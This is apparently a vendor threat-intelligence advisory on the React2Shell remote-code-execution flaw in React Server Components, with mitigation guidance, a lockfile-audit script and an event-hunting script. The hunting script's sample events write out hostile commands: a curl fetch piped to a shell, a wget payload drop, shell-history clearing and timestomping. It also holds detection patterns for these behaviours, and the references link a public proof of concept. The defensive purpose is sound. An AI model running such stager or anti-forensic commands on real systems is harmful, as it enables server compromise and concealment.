
CVE-2025-55182: Critical React Server Components Vulnerability (React2Shell) Exploited in Ransomware and APT Attacks

Rescana · 1 day ago · 4 min read

Executive Summary

The React2Shell vulnerability, tracked as CVE-2025-55182, is a critical unauthenticated remote code execution (RCE) flaw in React Server Components. Since its public disclosure in early December 2025 it has been weaponized by a spectrum of threat actors: ransomware operators, advanced persistent threat (APT) groups, and financially motivated cybercriminals. The flaw carries the maximum CVSS v3.x score of 10.0 and lets an attacker execute arbitrary code on an affected server with a single HTTP request, with no authentication at all, gaining the privileges of the web server process. Exploitation in the wild has been rapid and widespread, with observed payloads ranging from ransomware and cryptominers to custom Linux backdoors. The attack surface covers Next.js (App Router) and any other application that ships a vulnerable version of react-server-dom-webpack, react-server-dom-parcel, or react-server-dom-turbopack. Immediate patching and comprehensive threat hunting are strongly advised.

Threat Actor Profile

Multiple threat actor categories are actively exploiting React2Shell. Ransomware operators use the flaw for initial access, then move laterally and encrypt data. China-nexus APT groups, including Earth Lamia (UNC5454), Jackpot Panda, UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595, have been observed deploying custom Linux backdoors and tunneling tools, often against cloud infrastructure such as AWS and Alibaba Cloud. Iran-nexus actors, not yet attributed to a named group, are also exploiting the vulnerability for initial access and persistence. These groups employ tactics such as masquerading malware as system binaries, anti-forensics (timestomping, shell history clearing), and custom command-and-control (C2) infrastructure. Financially motivated cybercriminals are deploying cryptominers and commodity malware, typically through automated exploitation frameworks built on public proof-of-concept (PoC) code.

Technical Analysis of Malware/TTPs

The React2Shell vulnerability is an unsafe-deserialization flaw in React Server Components: the server-side code that decodes the RSC payload a client sends when it invokes a Server Function (a Next.js server action, for example) trusted attacker-controlled structure in that payload. A single crafted HTTP POST to an application that exposes Server Components is therefore enough to run arbitrary JavaScript inside the Node.js process, from which the attacker spawns shell commands, all with the privileges of the web server. No authentication is required, so every internet-exposed instance is reachable by mass scanners.

Observed malware includes the XMRig cryptominer, typically delivered via shell scripts such as sex.sh, and a suite of Linux backdoors including PeerBlight, COMPOOD, HISONIC, and ANGRYREBEL.LINUX. These payloads are usually downloaded and executed with wget or curl, with persistence established through cron jobs, systemd services, or lines injected into shell startup files. Advanced TTPs include reverse proxy tunneling tools such as MINOCAT and FRP, malware masquerading as legitimate system binaries (notably the OpenSSH daemon, sshd), and anti-forensic measures such as timestomping and shell history clearing.

APT groups have demonstrated a preference for in-memory web shell deployment, Unicode-obfuscated payloads, and the use of custom C2 domains such as reactcdn.windowserrorapis[.]com. Ransomware operators have been observed encrypting data post-exploitation, leveraging the initial foothold for lateral movement within cloud and on-premises environments.

Exploitation in the Wild

Since the public disclosure of CVE-2025-55182, exploitation has been observed globally, concentrated on cloud infrastructure, virtual private server (VPS) providers, and web applications built with React and Next.js. Telemetry indicates significant targeting of the Asia-Pacific region, including Taiwan, Vietnam, and China.

Ransomware campaigns have rapidly adopted the exploit, using it to gain initial access and deploy encryption payloads. Financially motivated actors are deploying cryptominers and commodity malware at scale, often using automated scanning and exploitation tools. China-nexus APT groups are leveraging the flaw for espionage and persistent access, deploying custom backdoors and tunneling tools to maintain long-term control over compromised infrastructure. Iran-nexus actors have also been observed exploiting the vulnerability, though their specific payloads and objectives remain less well-documented.

Multiple functional and non-functional PoCs are circulating in the public domain, including those with Unicode obfuscation and in-memory web shell deployment techniques. The rapid weaponization of the exploit underscores the criticality of immediate remediation.

Victimology and Targeting

Victims of React2Shell exploitation span a broad range of sectors, with a concentration in organizations operating cloud infrastructure, web application hosting, and SaaS platforms. Notably, AWS and Alibaba Cloud environments have been specifically targeted by China-nexus APT groups, with incidents observed in the Asia-Pacific region and among international VPS providers. The attack surface includes any organization running vulnerable versions of React Server Components or frameworks such as Next.js with the App Router feature enabled.

Ransomware operators are indiscriminate in their targeting, exploiting any exposed and vulnerable instance to maximize financial gain. APT groups, by contrast, exhibit more selective targeting, focusing on organizations of strategic interest, particularly those with valuable intellectual property or access to sensitive cloud infrastructure.

Mitigation and Countermeasures

Immediate patching is the most effective mitigation. Upgrade react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack (together with the matching react and react-dom releases) to 19.0.1, 19.1.2, or 19.2.1 at minimum; 19.2.2 or 19.2.3 is recommended for comprehensive coverage. Next.js applications bundle their own copy of these packages, so bumping the react-server-dom-* entries in package.json does not fix a Next.js app: upgrade next itself to the patched release for your deployment line as listed in the Next.js advisory. Only App Router applications use Server Components; the Pages Router is not exposed to this flaw.

A thorough audit of all application dependencies, including lockfiles and vendored copies, is essential to identify and remediate vulnerable packages. Because mass exploitation began within days of disclosure, any instance that was exposed while unpatched should be treated as potentially compromised and hunted, not merely patched: applying the fix does not remove a backdoor, cron job, or miner that is already installed. Security teams should monitor for indicators of compromise, including outbound connections to the known C2 domains and IP addresses, unexpected wget or curl activity originating from the web server process, creation of hidden (dot-prefixed) directories, unexplained process terminations, and modifications to shell startup files.
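The dependency audit above can be scripted. The following is an added example, not Rescana's tooling or anything from the React project: it walks an npm package-lock.json (v1 nested tree or v2/v3 packages map) and classifies every copy of the three react-server-dom-* packages against the patched versions quoted in this report. Assumptions are labelled in the code: 19.x releases after 19.2.1 are assumed to carry the fix, canary and experimental builds are flagged for manual review rather than judged, and the `next` package is reported but not classified, because Next.js vendors its own copy of these packages and must be compared with the Next.js advisory. The sample lockfile is constructed.

```python
"""Added example (not Rescana's tooling): audit an npm lockfile for the React
Server Components packages named in this report and classify each copy found.

Assumptions, labelled as such:
  * the patched versions are those quoted in the report (19.0.1, 19.1.2, 19.2.1);
    later 19.x releases are assumed to carry the fix;
  * canary/experimental builds are flagged for manual review rather than judged;
  * Next.js vendors its own copy of react-server-dom-* inside the `next` package,
    so the lockfile entry for `next` is reported for comparison with the Next.js
    advisory rather than classified here.
Supports package-lock.json v1 (nested "dependencies") and v2/v3 ("packages").
"""
import json
import re

RSC_PACKAGES = (
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
)
# React 19 minor line -> first patch level that contains the fix (from the report).
FIRST_FIXED_PATCH = {0: 1, 1: 2, 2: 1}
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(.+))?$")


def assess_version(version):
    """Classify one react-server-dom-* version string.

    Returns "vulnerable", "fixed", or "review" (prerelease, unparsable, or a
    major line the report does not cover)."""
    m = VERSION_RE.match(version)
    if not m:
        return "review"
    major, minor, patch, prerelease = int(m[1]), int(m[2]), int(m[3]), m[4]
    if prerelease or major != 19:
        return "review"  # canary/experimental and non-19.x: check the advisory by hand
    if minor in FIRST_FIXED_PATCH:
        return "fixed" if patch >= FIRST_FIXED_PATCH[minor] else "vulnerable"
    return "fixed"  # assumption: 19.3 and later were cut after the fix landed


def iter_lock_entries(lock):
    """Yield (install_path, package_name, version) for every installed package."""
    packages = lock.get("packages")
    if packages:  # lockfileVersion 2 or 3
        for path, meta in packages.items():
            if not path:
                continue  # "" describes the root project itself
            name = path.rsplit("node_modules/", 1)[-1]  # keeps @scope/name intact
            yield path, name, meta.get("version", "")
        return

    def walk(deps, prefix):  # lockfileVersion 1: nested dependency tree
        for name, meta in (deps or {}).items():
            path = f"{prefix}node_modules/{name}"
            yield path, name, meta.get("version", "")
            yield from walk(meta.get("dependencies"), path + "/")

    yield from walk(lock.get("dependencies"), "")


def audit_lockfile(lock_text):
    """Return one finding per react-server-dom-* copy (and per `next` copy) in the lockfile."""
    findings = []
    for path, name, version in iter_lock_entries(json.loads(lock_text)):
        if name in RSC_PACKAGES:
            findings.append({"name": name, "version": version, "path": path,
                             "status": assess_version(version)})
        elif name == "next":
            findings.append({"name": name, "version": version, "path": path,
                             "status": "check-nextjs-advisory"})
    return findings


# Constructed sample lockfile (not from any real project): one vulnerable copy at
# the top level, a fixed copy nested under next, and a canary build to review.
SAMPLE_LOCKFILE = json.dumps({
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "dependencies": {"next": "16.0.0", "react": "19.2.0"}},
        "node_modules/react": {"version": "19.2.0"},
        "node_modules/next": {"version": "16.0.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
        "node_modules/next/node_modules/react-server-dom-turbopack": {"version": "19.2.1"},
        "node_modules/react-server-dom-parcel": {"version": "19.2.0-canary-example"},
    },
})

if __name__ == "__main__":
    for f in audit_lockfile(SAMPLE_LOCKFILE):
        print(f"{f['status']:<22} {f['name']}@{f['version']}  ({f['path']})")
```

Run it against each lockfile in a monorepo and treat every "vulnerable" or "review" line, and every `next` line older than the patched release in your line, as a ticket; a clean lockfile still does not clear a host that was exposed before the upgrade.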

Proactive threat hunting should focus on new cron jobs, new or modified systemd units, lines appended to shell startup files, and dropped shell scripts, all of which indicate the persistence mechanisms described above, as well as on processes named like system daemons but running from temporary or hidden directories. Organizations should review vendor and threat intelligence updates regularly, as the threat landscape around React2Shell is evolving rapidly.
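The indicators listed in the two paragraphs above (wget/curl stagers launched from the web server process, a binary masquerading as sshd, cron/systemd/shell-startup persistence, history clearing, timestomping, and contact with the known C2 domain) can be turned into hunting logic. The block below is an added example, not Rescana's or any vendor's detection content. It assumes a simplified event shape (dicts with type, cmdline, comm, exe, parent_comm, path, host) that you would map your EDR or auditd fields onto, and the sample events are constructed, using RFC 5737 documentation addresses.

```python
"""Added example (not Rescana's tooling): hunt a stream of endpoint events for the
post-exploitation behaviour this report describes on hosts running React Server
Components: a web server process spawning shells and downloaders, curl/wget stagers,
a binary masquerading as sshd, cron/systemd/shell-startup persistence, shell-history
clearing, timestomping, and contact with the known C2 domain.

The event format (dicts with "type", "cmdline", "comm", "exe", "parent_comm",
"path", "host") is an assumed, simplified shape; map your EDR or auditd fields onto
it. The sample events below are constructed, with RFC 5737 documentation IPs.
"""
import re
from collections import Counter

KNOWN_C2_DOMAINS = {"reactcdn.windowserrorapis.com"}  # defanged in the report as [.]
WEB_SERVER_COMMS = {"node", "next-server", "next"}
LEGIT_SSHD_PATHS = {"/usr/sbin/sshd", "/usr/bin/sshd"}
STAGING_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
PERSISTENCE_PREFIXES = ("/etc/cron", "/var/spool/cron", "/etc/systemd/system",
                        "/lib/systemd/system", "/usr/lib/systemd/system", "/etc/profile")
RC_FILE_RE = re.compile(r"/\.(?:bashrc|bash_profile|bash_login|profile|zshrc|zprofile)$")

SHELL_OR_DOWNLOADER_RE = re.compile(r"^(?:\S*/)?(?:sh|bash|dash|zsh|curl|wget|python3?|perl)\b")
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b[^|;&]*?https?://")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba|da|z)?sh\b")
HISTORY_CLEAR_RE = re.compile(r"history\s+-c\b|unset\s+HISTFILE|HISTFILE=/dev/null|\brm\b[^;|&]*_history\b")
TIMESTOMP_RE = re.compile(r"\btouch\s+(?:-\S+\s+)*-(?:r|t|d)\b")


def classify_event(ev):
    """Return the list of finding labels that apply to one event (empty if benign)."""
    findings = []
    kind = ev.get("type")
    if kind == "exec":
        cmd = ev.get("cmdline", "")
        # The Node.js process behind Next.js has no business launching sh, curl or wget.
        if ev.get("parent_comm") in WEB_SERVER_COMMS and SHELL_OR_DOWNLOADER_RE.match(cmd):
            findings.append("web-server-spawned-shell")
        # Stager pattern from the report: fetch a script and pipe it to a shell, or drop it in a tmp dir.
        if DOWNLOAD_RE.search(cmd) and (PIPE_TO_SHELL_RE.search(cmd) or any(d in cmd for d in STAGING_DIRS)):
            findings.append("remote-stager")
        # Masquerading: a process calling itself sshd but not running from the packaged binary.
        if ev.get("comm") == "sshd" and ev.get("exe", "") not in LEGIT_SSHD_PATHS:
            findings.append("masqueraded-sshd")
        if HISTORY_CLEAR_RE.search(cmd):
            findings.append("history-clearing")
        if TIMESTOMP_RE.search(cmd):
            findings.append("timestomping")
    elif kind == "file_write":
        path = ev.get("path", "")
        if path.startswith(PERSISTENCE_PREFIXES) or RC_FILE_RE.search(path):
            findings.append("persistence-write")
    elif kind in ("dns", "connect"):
        host = ev.get("host", "").lower().rstrip(".")
        if host in KNOWN_C2_DOMAINS or any(host.endswith("." + d) for d in KNOWN_C2_DOMAINS):
            findings.append("known-c2-contact")
    return findings


def hunt(events):
    """Return [(event_index, label), ...] for every finding across the stream."""
    return [(i, label) for i, ev in enumerate(events) for label in classify_event(ev)]


def summarize(hits):
    """Count findings per label, e.g. to decide which hosts to triage first."""
    return Counter(label for _, label in hits)


SAMPLE_EVENTS = [  # constructed sample telemetry, not from a real incident
    {"type": "exec", "parent_comm": "node", "comm": "sh", "exe": "/bin/sh", "user": "www-data",
     "cmdline": "sh -c 'curl -s http://203.0.113.10/sex.sh | sh'"},
    {"type": "exec", "parent_comm": "sh", "comm": "wget", "exe": "/usr/bin/wget", "user": "www-data",
     "cmdline": "wget -q -O /dev/shm/.x http://203.0.113.10/x"},
    {"type": "exec", "parent_comm": "sh", "comm": "sshd", "exe": "/tmp/.X11-unix/sshd", "user": "www-data",
     "cmdline": "/tmp/.X11-unix/sshd"},
    {"type": "exec", "parent_comm": "systemd", "comm": "sshd", "exe": "/usr/sbin/sshd", "user": "root",
     "cmdline": "/usr/sbin/sshd -D"},
    {"type": "file_write", "path": "/etc/cron.d/system-update", "user": "www-data"},
    {"type": "file_write", "path": "/home/www-data/.bashrc", "user": "www-data"},
    {"type": "file_write", "path": "/var/www/app/.next/cache/fetch-cache/abc", "user": "www-data"},
    {"type": "exec", "parent_comm": "sh", "comm": "touch", "exe": "/usr/bin/touch", "user": "www-data",
     "cmdline": "touch -r /usr/sbin/sshd /tmp/.X11-unix/sshd"},
    {"type": "exec", "parent_comm": "sh", "comm": "sh", "exe": "/bin/sh", "user": "www-data",
     "cmdline": "sh -c 'history -c; unset HISTFILE'"},
    {"type": "dns", "host": "reactcdn.windowserrorapis.com", "user": "www-data"},
    {"type": "connect", "host": "registry.npmjs.org", "user": "www-data"},
]

if __name__ == "__main__":
    hits = hunt(SAMPLE_EVENTS)
    for i, label in hits:
        print(f"event {i:2d}: {label}")
    print(dict(summarize(hits)))
```

The "web-server-spawned-shell" rule is the one worth deploying first: a Next.js process forking sh, curl, or wget is almost never legitimate, and it fires at the moment of exploitation rather than after persistence is already in place. The others are lower-fidelity on their own (administrators also write cron jobs and run touch -r) and are best used to pivot from a first hit on the same host.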

Network segmentation, least privilege for the web server process (no outbound internet access except to the destinations the application needs, no write access to cron or systemd directories), and robust logging are recommended to limit the blast radius of successful exploitation. Where possible, restrict public exposure of applications using React Server Components and deploy web application firewall (WAF) rules that detect and block exploit attempts; treat such rules as a stopgap rather than a fix, since the Unicode-obfuscated payloads already seen in the wild are designed to evade signature matching.

References

Google Cloud Threat Intelligence: https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182

Wiz Blog: https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182

Trend Micro PoC Analysis: https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html

Huntress PeerBlight Backdoor: https://www.huntress.com/blog/peerblight-linux-backdoor-exploits-react2shell

React Security Advisory: https://react.dev/security/advisories/CVE-2025-55182

Next.js Security Advisory: https://nextjs.org/security/advisories/CVE-2025-55182

NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

Functional PoC (GitHub, ejpir): https://github.com/ejpir/react2shell-poc

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their digital supply chain. Our platform leverages advanced threat intelligence, continuous monitoring, and automated workflows to empower security teams with actionable insights and proactive defense capabilities. For questions about this report or to learn more about how Rescana can help secure your organization, contact us at ops@rescana.com.